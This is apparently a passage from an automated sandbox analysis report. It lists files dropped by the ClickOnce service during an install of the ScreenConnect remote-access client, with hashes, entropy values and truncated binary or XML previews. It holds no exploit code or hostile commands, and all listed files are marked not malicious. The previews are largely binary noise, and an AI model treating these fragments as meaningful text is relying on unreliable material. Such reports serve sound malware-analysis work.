                                                                                                                                                                                                                                                        Preview:p...... ....(...D.n.i'..(................].G{%....}p.*....................}p.*.. .........G..&.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):254
                                                                                                                                                                                                                                                        Entropy (8bit):3.049926868931216
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:6:kK+u/hLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:mu/hLYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                        MD5:534C76AC04016DB09CA8FB9C0EB87C45
                                                                                                                                                                                                                                                        SHA1:10F9D6A9C99B9B57FC99A0CDB5E2BBD4DC9B10EE
                                                                                                                                                                                                                                                        SHA-256:FAB73D8A729EB3E0223AC7497AC1639384AAC115CBFC3FCCF30D955813C75659
                                                                                                                                                                                                                                                        SHA-512:CE35E789EA7455D7684CDAF9D3CFB759BD822B4062DC3B27AB78B48DE92D8365AFCC326A683DB039508D089B7221E4AEBA6AF61B8568E0845324C2107E12B968
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:p...... ....l....sV.N'..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):25496
                                                                                                                                                                                                                                                        Entropy (8bit):5.428251555871276
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:/rqv5Gch6wX91yYFX9R/QPIBM7Yi1wUw+xC+l:/Wrh6wX9PX9R/QPI+0i1wd+l
                                                                                                                                                                                                                                                        MD5:C16F33F201063E11E26801F4214822CA
                                                                                                                                                                                                                                                        SHA1:05E4FA15D525426AA06B9DCB2A102A74D9958048
                                                                                                                                                                                                                                                        SHA-256:188EBE0620C46E399408F12FC6D2F6809EF01F366AAE146B9C60B1CB87297E63
                                                                                                                                                                                                                                                        SHA-512:D4306AFE91ADBF545C5EB978254B5633351243B338587793D4C1A3F5CE70CDD87CBC5D98030FDB7413E571D2B4A1889680D546F05B93977C1B5CF0AD08B5BD97
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........R....&..f.......!...T...........................e...?....<.g..J.|r,..`P....}'.d.........8........R....................U.K...W.....U..c...................'-........s".I...R.....$...........U............S..{.........6.......'~.x.h.....[...........5...M...8..........~9......-.a:...j.......;...K*...!.<......6..A....y.].m..C....=4.....E....&..{.!.G....qz...#aI...@.R....K....u..IV..N......D..O.....E..X.R......3LD.SV...[s.T..<Y...O.&r..Vz\...........`.......=...P...S...W...Z...].......,.......L.......T.......\.......`.......|...........................................@.......0...........<.......T.......h.......|...0.......................................0...........<.......T.......h.......|...0.......................................0...........8.......L.......`...0...l.......................................................................,.......8.......L.......`.......l...........................................................................................@...

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (10073), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):17858
                                                                                                                                                                                                                                                        Entropy (8bit):5.954498332217529
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:heoXUrotw1aMWf6PX9hhyYF6X9FX9R/QPIYM7Y7:hV6PX9J6X9FX9R/QPIN07
                                                                                                                                                                                                                                                        MD5:9896F09BBC139E973FBA917FDA83C893
                                                                                                                                                                                                                                                        SHA1:56D9E63E078DAE56125B3B1F2E6A71A5F310E5DC
                                                                                                                                                                                                                                                        SHA-256:7831765826E44631D78ED36FA9D04F65B30E3A67FEFFB41E393FD73A063C7F61
                                                                                                                                                                                                                                                        SHA-512:024BAE2420FBA1790D946432336462F1A9F43388345393D9838EC913D109D198103182A853596B512A6C5E0F81096A1F76EA8A60908A456C320C32B8C5FA22CD
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <asmv1:assemblyIdentity name="ScreenConnect.WindowsClient.exe" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" type="win32" />.. <application />.. <entryPoint>.. <assemblyIdentity name="ScreenConnect.WindowsClient" version="24.2.3.8936" publicKeyToken="4B14C015C87C1AD8" language="neutral" processorArchitecture="msil" />.. <commandLine file="ScreenConnect.WindowsClient.exe" parameter

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3452
                                                                                                                                                                                                                                                        Entropy (8bit):4.233644183250401
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:WsWWOeV+WwQXzmLoK8dF2G10PBFEphIYX:RJKkBzz1wETf
                                                                                                                                                                                                                                                        MD5:977F7CBC9E20DB8BD1A49B8BFC9E6424
                                                                                                                                                                                                                                                        SHA1:8BAE9FF39AAAEF73FB8D1C986EDC07C16A4A2332
                                                                                                                                                                                                                                                        SHA-256:EA52409AC30959D9568FC303D255BCDE3B15EC2C8426A8D37E4BF5466431C205
                                                                                                                                                                                                                                                        SHA-512:663908198C50AF199FE5D88011E8799365EB1137B5CDFC8DF2638F43495B135A6A744BD092539B451654FB22E480F45DC4A05FC6A0A2DBE28F441B88D0CEE3F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........v0o.K..#...(.......T..........................."........<.g..J.|r,..`P..............E..X......U..c...................'-........s".I...R.....$...........U..........'~.x.h.................z..w.....[~31.X....s)..;$D......B(.........f..VC.........;..........................0...@...0...p...0.......0...................................0.......4.......D.......T.......\...4...h...........P...\...........@...................................,...(...4.......\.......d.......x...(.......................(.......................(...........$...4...,.......`...................................................................................................................................................................................................nameScreenConnect.Core%%processorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.3.8936%....................................................MdHd............D...........MdSp(...$...&...(...#............... urn:schemas

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1215
                                                                                                                                                                                                                                                        Entropy (8bit):5.132426421892876
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onR+geP0AqvSkcVSkcMKzpdciSkTo:3FYZ8h9o4gI0AmGVETDTo
                                                                                                                                                                                                                                                        MD5:7836CB4BB4AA3204BE8BCB1998653762
                                                                                                                                                                                                                                                        SHA1:555EBD513BB5C4EE073415FD71F24D0697038F6D
                                                                                                                                                                                                                                                        SHA-256:F1E8F85E0495160BBA92E1B89C8C5A1BE51E5F7CC289212CBBAF6FC6141B4076
                                                                                                                                                                                                                                                        SHA-512:B18CC8779DCF15AB7DA2604F4D48E53870FE84E22B1CEE34AF9CC9D9B5B7A0CC5AABF11CC08CADD137A8CAA86451326A770B5FAC727E84E9721206649E4AE7A7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Core" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Core.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Configuration" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.0" />.. </dependentAssemb

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):5256
                                                                                                                                                                                                                                                        Entropy (8bit):3.9560495626717898
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:sw4+Rzg5heV+Ww7kkKJOlVolwKvfCQwnANbz:RRzg4JuKSyyDzAp
                                                                                                                                                                                                                                                        MD5:EA4764595A926883ED9EE011626FF7C1
                                                                                                                                                                                                                                                        SHA1:170F58999144BEC6D84EB2A6148BA65ED6A6C774
                                                                                                                                                                                                                                                        SHA-256:8FA57D0AE9DE1E6BBB5EBAC3EF3A92C30B67A82128E025E532D85BD3C5B10CF1
                                                                                                                                                                                                                                                        SHA-512:FFC0F18C8F7C9C43FEE56C686C2E657994418AD19C2937C674CEDEE72F4A1CABA48EE1C78C7950CA1B723E93F5218F17ADE07A093012751AE9B0FAFF8D267D67
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH..........[...Dv4...t.......T...............P...........3........<.g..J.|r,..`P............O.&r..Vz.....U..c...................'-........s".I...R.....$...........U..........[.......................z..w.....[~31.X....C.........y..&..d......B(.........^.ie...u".....E..X.%...s".I...R&...F.....Ey)....+.`...m,......;../............... ...#...'...*...-...0...0.......0...D...0...t...0.......0.......0.......0...4...0...d...................................................................4...........4...P...........h...@.......................................(...................$...(...8.......`.......h.......x...(.......................(...............................(... .......H.......P...(...`...................(.......................(...............d...........l.......................................................................................................................................................................................................................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1980
                                                                                                                                                                                                                                                        Entropy (8bit):5.059741759134869
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:24:JdFYZ8h9onRbggeP0AIvSkcyMwcVSkcHSkcf5bdcadccdcckdTo:3FYZ8h9oygI0AEHMwGQAXRTFgTo
                                                                                                                                                                                                                                                        MD5:22FE4BC3BB143D14D2142E096955F9B7
                                                                                                                                                                                                                                                        SHA1:332597F5A4D2D3724DCFDA19AF7734846CEDF474
                                                                                                                                                                                                                                                        SHA-256:39D81BE76E978E5D6BF4DC5F74226E48FA4EA77780A6792CAB947C5D20D4A6AA
                                                                                                                                                                                                                                                        SHA-512:508660E83C75AD55A11CDDC6381547536A4CBB5A4A940D3D17F77AD256C9943360650750343FE32C86F6DC462273AEAE68E40903F2C33A0AD9F09D393FB1B59F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Windows" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Windows.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </depende

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):6584
                                                                                                                                                                                                                                                        Entropy (8bit):3.947719410446542
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:Rh0PPBpRCeV+Www+8WpRyFoFFU9Q4BcwSUq+aFTVqO/t7:kPPPJypRyFH9Q4p5Ta1VR
                                                                                                                                                                                                                                                        MD5:AADC6A1A71086A2A3A1255842E163C23
                                                                                                                                                                                                                                                        SHA1:EA1E1035561EE7FBD30D3800DED632B870C5A3ED
                                                                                                                                                                                                                                                        SHA-256:8F78F2DFB7BDDFF068739F913086C89B066561A267607863D57DD516B759DB48
                                                                                                                                                                                                                                                        SHA-512:2AF38F3E7D9412E1858D1029C442D58F9A21C5FF73CA98CE75EF09A318A9090ECD703111BA5E4E1F1EADC37812E5148E8FA9B4E906724B2CB84E2DB6C8D12ED9
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........Ah...l-@...........T...............t...........?........<.g..J.|r,..`P.............U.K...W.....U..c...................'-........s".I...R.....$...........U..............}'.d................z..w.....[~31.X....[s.T..<....s".I...R....y..&..d."....B(.....#...C.....&...^.ie...u).....E..X.,...F.....Ey/...O.&r..Vz2...f..VC..5......;..8.....V....X;........... ...$...'...*...-...0...3...6...9...<...0.......0.......0.......0...4...0...d...0.......0.......0.......0...$...0...T...0.......................................................................4...$.......X...P...T...........@...................................,...(...4.......\.......d.......x...(...............................(.......................(...........D.......L...(...`...................(.......................(.......................(...,.......T.......\...(...h...................(.......................(...................................................................................................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):2569
                                                                                                                                                                                                                                                        Entropy (8bit):5.030098902772427
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:3FYZ8h9o5gI0AbHMwAXQ3MwTMwRGTDBTo:1YiW4AohvNo
                                                                                                                                                                                                                                                        MD5:F89D1C01400FCD12B5BB47E952ECBBCF
                                                                                                                                                                                                                                                        SHA1:D23F66FF01B2D06227208FFC88D0A923E99F565A
                                                                                                                                                                                                                                                        SHA-256:D540814FA7D487264D0167616D1EABDB78B4D4C0795B124452108CB14675DC26
                                                                                                                                                                                                                                                        SHA-512:A4513910019A2D7DB8A414D4A53CE7AC51FF30BD5631115F465F96119FD80D911EE4F9FFED4CB4C464F0235DA6CF3967DA583570E23B55F55B6E3DAAAF947773
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.WindowsClient" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.WindowsClient.exe" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System.Drawing" publicKeyToken="b03f5f7f11d50a3a" version="2.0.0.

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):3032
                                                                                                                                                                                                                                                        Entropy (8bit):4.879316106971163
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:48:Ca6Q/cAgJOe6S+9oww7gk7Fw+f7iI++5dFkEM6VbjftBcnwbOA:CaV/cMeV+WwwFFwOiMRkbortBcnEOA
                                                                                                                                                                                                                                                        MD5:9E8D6EC04E6DAE62C8391BF0BE0FE3A2
                                                                                                                                                                                                                                                        SHA1:5917F15F6A52987E3EA0110B34C58255F5FEB70D
                                                                                                                                                                                                                                                        SHA-256:FCCA9752E5A1D860D76CDAEFF5336BE9A2014AAFE714A5EE29B817294983C11F
                                                                                                                                                                                                                                                        SHA-512:517C426E8A04ECC63158695C20F365DB8553B6C21B7E67213E55CF370C4910C1263AC831033D31FA05444579842FD0150EEF0030A3DFD31914A6824F2B70692F
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH........%..").|............T....................................<.g..J.|r,..`P............[s.T..<.....U..c...................'-........s".I...R.....$...........U............S..{..................z..w.....[~31.X......E..X.....s".I...R.......;......................0.......0...@...0...p...................................................................4...........<...P...........P...@...h...................................(...............................(...,.......T.......\...(...d...........(...............................................................................................................................................................nameScreenConnect.ClientprocessorArchitecture%%%msilpublicKeyToken%%4B14C015C87C1AD8version%24.2.3.8936%....................................................MdHd............<...........MdSp ...$....... ...".............Bp urn:schemas-microsoft-com:asm.v1.assembly.xmlns.1.0.manifestVersion urn:schemas-microsoft-com:asm.v2.asmv2)

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):1039
                                                                                                                                                                                                                                                        Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                        MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                        SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                        SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                        SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.cdf-ms

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):14608
                                                                                                                                                                                                                                                        Entropy (8bit):5.715268356181181
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:I1DT9rI6wOvx58s8oEtYLN8s8oTN2x2QPIlFDLhEDh7BqWojO3:I139rI6wAX9LX9R/QPIBM7Yj0
                                                                                                                                                                                                                                                        MD5:7EFAF2FC46850F0860CBD305150EB7B2
                                                                                                                                                                                                                                                        SHA1:743FB1D5BBBBD7B69EECC715D997A16E2007B851
                                                                                                                                                                                                                                                        SHA-256:5A2054624576165111DA0E08BF0D2CA0E71491DDC622725DEAFB9FBB3454154A
                                                                                                                                                                                                                                                        SHA-512:237457304DAE4CB7203A43841DB9AC32B94674217F64BD43B89BA3F5AC4D0D40FBD3AF6715FA10B61068E93AD346DE302CD1561A3DD5B1E6B6B1F82262B781AF
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:PcmH..........q.g-#.$...@.......T...............8...........#........<.g..J.|r,..`PF...}&............Z.....)....E......x...\......=+.p.......I\t.\..>................j.K...6.....U..c...................'-...........-.a.....$...........U...............8........R...........}'.d....j...........K*...!.................`...........................0...................................................(.......@.......P.......T...'...X...................................................4................3......P....7......<8......D8......L8......l8......p8..L...x8.......8.......8.......8.......8.......8..ScreenConnect.Client.manifest%%%V..>...V.[;..jq........'............-........................E......................................4.0.30319%%%Client%%4.0%ScreenConnect Software%%ScreenConnect Client....................................P.......nameScreenConnect.WindowsClient.application%processorArchitecture%%%msilpublicKeyToken%%25b0fbb6ef7eb094version%24.2.3.8936%........................

                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Apps\2.0\66ZOCDX0.3Q8\R62K8ZQ0.MO3\manifests\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee.manifest

                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (63849), with CRLF line terminators
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):118229
                                                                                                                                                                                                                                                        Entropy (8bit):5.585370839513735
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:3072:r7N8cT51/FXvMVNWfCXq9ymfm2o9HuzhJOvP:r6cfiVIBmt8vOvP
                                                                                                                                                                                                                                                        MD5:14CBFC8E1EE96D3503274F68DB7280B9
                                                                                                                                                                                                                                                        SHA1:964378CACB140A0771934E0D4B6EEEB18EE17B99
                                                                                                                                                                                                                                                        SHA-256:490F27B351F34197BEA76860091B7EBAB90F8427BD79C95889D2A12222C5CC00
                                                                                                                                                                                                                                                        SHA-512:410605A4400CA3A5C3F90E998755B5D76013E2314990A51F6F08150E8CC370FB8EC14F3F2B3D180B61322489D7F2672C0AB70F9EC7E4A6CE1566BBAE77A6AE2E
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview:.<?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns:co.v1="urn:schemas-microsoft-com:clickonce.v1" xmlns:co.v2="urn:schemas-microsoft-com:clickonce.v2">.. <assemblyIdentity name="ScreenConnect.WindowsClient.application" version="24.2.3.8936" publicKeyToken="25b0fbb6ef7eb094" language="neutral" processorArchitecture="msil" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <description asmv2:publisher="ScreenConnect Software" asmv2:product="ScreenConnect Client" xmlns="urn:schemas-microsoft-com:asm.v1" />.. <deployment install="false" trustURLParameters="tru

